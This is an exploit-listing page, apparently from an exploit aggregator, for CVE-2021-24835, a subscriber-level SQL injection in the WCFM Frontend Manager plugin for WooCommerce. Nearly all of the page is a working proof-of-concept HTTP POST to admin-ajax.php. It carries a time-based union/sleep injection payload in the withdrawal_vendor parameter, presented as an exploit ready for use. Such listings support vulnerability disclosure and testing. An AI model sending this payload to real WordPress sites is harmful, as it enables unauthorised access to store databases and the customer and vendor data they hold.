Exploit for WCFM - Frontend Manager for WooCommerce < 6.5.12 - Customer/Subscriber+ SQL Injection CVE-2021-24835

Name: Exploit for WCFM - Frontend Manager for WooCommerce < 6.5.12 - Customer/Subscriber+ SQL Injection CVE-2021-24835
Rating: 5 (331 reviews)

2021-10-11 | CVSS 6.5

## https://sploitus.com/exploit?id=WPEX-ID:C493AC9C-67D1-48A9-BE21-824B1A1D56C2
With the woocommerce, wc-frontend-manager and wc-multivendor-marketplace plugins installed

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: [subscriber+]
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 115

action=wcfm_ajax_controller&controller=wcfm-withdrawal-reverse&withdrawal_vendor=1+union+select+1+and+sleep(10)--+-